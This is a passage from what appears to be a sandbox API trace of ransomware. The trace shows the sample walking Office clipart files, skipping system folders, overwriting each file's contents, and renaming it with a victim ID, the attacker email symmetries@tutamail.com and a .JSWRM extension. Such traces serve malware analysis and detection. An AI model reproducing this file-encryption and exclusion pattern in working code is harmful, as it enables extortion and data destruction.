lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4f0, lpOverlapped=0x0) returned 1 [0084.585] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.585] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4f0, lpOverlapped=0x0) returned 1 [0084.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0084.585] CloseHandle (hObject=0x314) returned 1 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0084.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0084.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0084.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0084.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0084.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0084.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0084.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0084.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0084.587] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152694.WMF", cAlternateFileName="")) returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2=".") returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="..") returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="...") returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="windows") returned -1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="recovery") returned -1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="perflogs") returned -1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="documents and settings") returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="system volume information") returned -1 [0084.587] lstrcmpiW (lpString1="J0152694.WMF", lpString2="msocache") returned -1 [0084.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152694.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152694.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152694.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0084.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152694.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152694.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152694.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0084.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0084.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.632] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1348) returned 1 [0084.632] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x540) returned 0x234408 [0084.632] ReadFile (in: hFile=0x314, lpBuffer=0x234408, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesRead=0x345e89c*=0x540, lpOverlapped=0x0) returned 1 [0084.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.679] WriteFile (in: hFile=0x314, lpBuffer=0x234408*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesWritten=0x345e898*=0x540, lpOverlapped=0x0) returned 1 [0084.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234408 | out: hHeap=0x1e0000) returned 1 [0084.679] CloseHandle (hObject=0x314) returned 1 [0084.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0084.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0084.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0084.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0084.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0084.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0084.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0084.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0084.681] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c98, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152696.WMF", cAlternateFileName="")) returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2=".") returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="..") returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="...") returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="windows") returned -1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="recovery") returned -1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="perflogs") returned -1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="documents and settings") returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="system volume information") returned -1 [0084.681] lstrcmpiW (lpString1="J0152696.WMF", lpString2="msocache") returned -1 [0084.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0084.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152696.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152696.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152696.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0084.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0084.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152696.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152696.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152696.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0084.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0084.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0084.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.682] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7320) returned 1 [0084.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c90) returned 0x205850 [0084.683] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c90, lpOverlapped=0x0) returned 1 [0084.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.724] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c90, lpOverlapped=0x0) returned 1 [0084.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.724] CloseHandle (hObject=0x314) returned 1 [0084.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0084.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0084.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0084.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0084.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0084.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0084.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0084.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0084.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0084.726] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea312e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea312e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152698.WMF", cAlternateFileName="")) returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2=".") returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="..") returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="...") returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="windows") returned -1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="recovery") returned -1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="perflogs") returned -1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="documents and settings") returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.726] lstrcmpiW (lpString1="J0152698.WMF", lpString2="system volume information") returned -1 [0084.727] lstrcmpiW (lpString1="J0152698.WMF", lpString2="msocache") returned -1 [0084.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152698.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152698.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152698.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152698.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152698.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152698.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0084.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0084.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0084.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.729] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1208) returned 1 [0084.729] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b0) returned 0x230a00 [0084.729] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4b0, lpOverlapped=0x0) returned 1 [0084.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.760] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4b0, lpOverlapped=0x0) returned 1 [0084.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0084.760] CloseHandle (hObject=0x314) returned 1 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0084.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0084.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0084.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0084.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) 